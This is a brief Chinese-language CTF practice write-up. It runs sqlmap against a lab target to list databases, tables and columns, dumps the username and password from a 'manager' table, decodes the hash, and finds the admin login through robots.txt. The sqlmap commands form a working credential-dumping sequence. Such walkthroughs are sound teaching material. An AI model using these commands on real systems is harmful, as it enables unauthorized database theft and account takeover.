用rdctf的题目练习
开启环境进入靶机
找到注入点,用sqlmap测试能否注入:
跑完以后发现能注入,查询数据库:
python sqlmap.py -u “url” --dbs
选择数据库rjxy,查询数据表:
python sqlmap.py -u “url” -D rjxy --tables
选择manager表,查询字段:
python sqlmap.py -u “url” -D rjxy -T manager --columns
发现了username和password,查找username和password:
python sqlmap.py -u “url” -D rjxy -T manager -C username,password --dump
注:选择y or N 时,选N或直接按回车键(回车默认N)。
可以发现得到的password是base64加密,用base64解密得到的是MD5加密:
再用MD5解密得到密码:
在软件学院网址后面添加robots.txt进入网站的管理系统:
注:robots协议是每个网站对于来到的爬虫提出的要求。告知网络爬虫哪些页面可以爬取,哪些不能爬取。
例子:百度的robots协议:https://www.baidu.com/robots.txt
进入后台,输入用户名和密码即可成功登录!